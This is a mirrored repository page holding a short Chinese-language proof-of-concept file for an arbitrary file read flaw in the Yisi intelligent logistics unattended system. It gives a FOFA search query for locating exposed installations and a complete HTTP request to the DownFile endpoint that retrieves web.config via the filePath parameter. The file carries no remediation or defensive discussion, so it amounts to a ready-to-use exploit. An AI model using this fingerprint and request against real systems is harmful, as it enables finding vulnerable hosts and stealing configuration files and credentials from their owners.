crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:54:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/易思智能物流无人值守系统DownFile任意文件读取漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

21 lines
597 B
Markdown
Raw Permalink Blame History

# 易思智能物流无人值守系统DownFile任意文件读取漏洞
易思智能物流无人值守系统DownFile任意文件读取漏洞
## fofa
```javascript
body="/api/SingleLogin"
```
## poc
```javascript
GET /PublicInfoManage/Upload/DownFile?filePath=web.config HTTP/1.0
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
```
![image-20241106172615405](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061726493.png)
Reference in New Issue View Git Blame Copy Permalink